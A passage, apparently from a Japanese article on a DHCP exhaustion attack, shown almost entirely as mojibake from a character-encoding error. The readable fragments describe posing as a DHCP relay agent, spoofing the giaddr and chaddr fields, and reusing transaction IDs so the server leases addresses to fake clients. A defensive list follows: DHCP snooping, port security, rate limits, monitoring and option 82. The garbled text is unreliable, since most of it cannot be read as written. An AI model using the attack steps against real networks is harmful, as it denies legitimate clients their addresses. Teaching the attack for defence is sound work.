ãããã£ãŠã空ãIPã¢ãã¬ã¹ã®ããŒã«å šäœãå¿ããæ£åœãªDHCPã¯ã©ã€ã¢ã³ãã¯12æéåŸã«ã®ã¿ãã®DHCPãµãŒããŒããIPã¢ãã¬ã¹ãååŸã§ããŸãã æ£åœãªDHCPãµãŒããŒã¯ã¯ã©ã€ã¢ã³ãã«å¿çãéä¿¡ã§ããŸããããç§ãã¡ã¯ãããè¡ãããšãã§ããŸãïŒ
ä»çµã¿ïŒ
ãããŒããã£ã¹ãDHCPDISCOVERèŠæ±ãäœæããŠéä¿¡ãããšåæã«ãDHCPãªã¬ãŒãšãŒãžã§ã³ããšããŠèªåèªèº«ãæ瀺ããŸãã giaddr ïŒãªã¬ãŒãšãŒãžã§ã³ãIPïŒãã£ãŒã«ãã§ã chaddr ïŒã¯ã©ã€ã¢ã³ãMACã¢ãã¬ã¹ïŒãã£ãŒã«ãã«IPã¢ãã¬ã¹192.168.1.2ãæå®ããŸã-ã©ã³ãã MAC 00ïŒ19ïŒbbïŒf5ïŒe7ïŒa8 ãåæã«SRC MACãèšå®ããŸãMACã¢ãã¬ã¹
ãµãŒããŒã¯DHCPOFFERã¡ãã»ãŒãžã§ãªã¬ãŒãšãŒãžã§ã³ãïŒusïŒã«å¿çããã¯ã©ã€ã¢ã³ãã«MACã¢ãã¬ã¹00ïŒ19ïŒbbïŒf5ïŒe7ïŒa8 IPã¢ãã¬ã¹192.168.1.232ãæäŸããŸãã
DHCPOFFERãåä¿¡ããåŸããããŒããã£ã¹ãDHCPREQUESTèŠæ±ãéä¿¡ããã³ãŒã50ïŒ èŠæ±ãããIPã¢ãã¬ã¹ ïŒã®DHCPãªãã·ã§ã³ã§ãã¯ã©ã€ã¢ã³ãã«æäŸãããIPã¢ãã¬ã¹192.168.1.232ãèšå®ããã³ãŒã12ïŒ ãã¹ãåãªãã·ã§ã³ ïŒã®ãªãã·ã§ã³ã§ -ã©ã³ãã ãªæååãèšå®ããŸãã éèŠïŒ DHCPREQUESTããã³DHCPDISCOVERã®xid ïŒãã©ã³ã¶ã¯ã·ã§ã³IDïŒããã³chaddr ïŒã¯ã©ã€ã¢ã³ãMACã¢ãã¬ã¹ïŒãã£ãŒã«ãã®å€ã¯åãã§ããå¿ èŠããããŸããããã§ãªãå ŽåããµãŒããŒã¯åãã¯ã©ã€ã¢ã³ãããã®å¥ã®ãã©ã³ã¶ã¯ã·ã§ã³ãŸãã¯åããã©ã³ã¶ã¯ã·ã§ã³ãæã€å¥ã®ã¯ã©ã€ã¢ã³ãã®ããã«èŠããããããªã¯ãšã¹ããããããããŸãã
- ãµãŒããŒã¯DHCPACKã¡ãã»ãŒãžããªã¬ãŒãšãŒãžã§ã³ãã«éä¿¡ããŸãã ãã以éãIPã¢ãã¬ã¹192.168.1.232ã¯ãMACã¢ãã¬ã¹00ïŒ19ïŒbbïŒf5ïŒe7ïŒa8ãæã€ã¯ã©ã€ã¢ã³ãçšã«12æéäºçŽãããŠãããšèŠãªãããŸãïŒããã©ã«ãã®ãªãŒã¹æéïŒã
çµè«
察çïŒ
DHCPã¹ããŒãã³ã°ã¯ãDHCPãããã³ã«ã䜿çšããæ»æããä¿è·ããããã«èšèšãããã¹ã€ããæ©èœã§ãã ããšãã°ããããã¯ãŒã¯äžã®DHCPãµãŒããŒã眮æããæ»æã
ããŒãã»ãã¥ãªã㣠-ããŒããä»ããŠããŒã¿ãéä¿¡ã§ãããã¹ãã®MACã¢ãã¬ã¹ãæå®ã§ããã¹ã€ããæ©èœã ãã®åŸãéä¿¡è ã®MACã¢ãã¬ã¹ãæ¿èªæžã¿ãšããŠæå®ãããªãéããããŒãã¯ãã±ãããéä¿¡ããŸããã
1ã€ã®MACã¢ãã¬ã¹ãIPã¢ãã¬ã¹ããã®DHCPDISCOVERããã³DHCPREQUESTèŠæ±ã®æ°ãå¶éããããã®ãããã¯ãŒã¯æ©åšã®æ§æã
ãããã¯ãŒã¯ãã©ãã£ãã¯ãèšé²ããã³åæããŠãç°åžžã远跡ããŸãã ããšãã°ããããã¯ãŒã¯äžã®DHCPèŠæ±ã®éåžžã®æ°ã¯1æ¥ããã100ã200ãè¶ ãããDHCPã®æ¯æžæ»æã®éããã®æ°ã¯äœåºŠãå¢å ããŸãã å¥ã®äŸïŒéåžžããããã¯ãŒã¯äžã§DHCPå¿çã®æ°ã¯DHCPèŠæ±ã®æ°ãè¶ ãããDHCPå¿çã®æ°ã¯DHCPèŠæ±ã®æ°ã2åã«ããŸããã ããã¯ã誰ããDHCPãµãŒããŒã®ä»£ããã«æ»æãè¡ã£ãŠããããšãæå³ããŸãã
IDS ã IPS ã SIEM ãããã³Zabbixãªã©ã®æ©åšç£èŠã·ã¹ãã ã®äœ¿çšã
å¯èœã§ããã°ãDHCPãµãŒããŒã§MAC-IPéçãã€ã³ãã£ã³ã°ã䜿çšããŸãã
DHCPãªãã·ã§ã³82ããµããŒãããDHCPãªããŒã¿ãŒãšDHCPãµãŒããŒã䜿çšããŸãã
- ç¶ç¶çãªãœãããŠã§ã¢æŽæ°ã ãšã«ãããã¹ããæŽæ°ã§ããŸã:)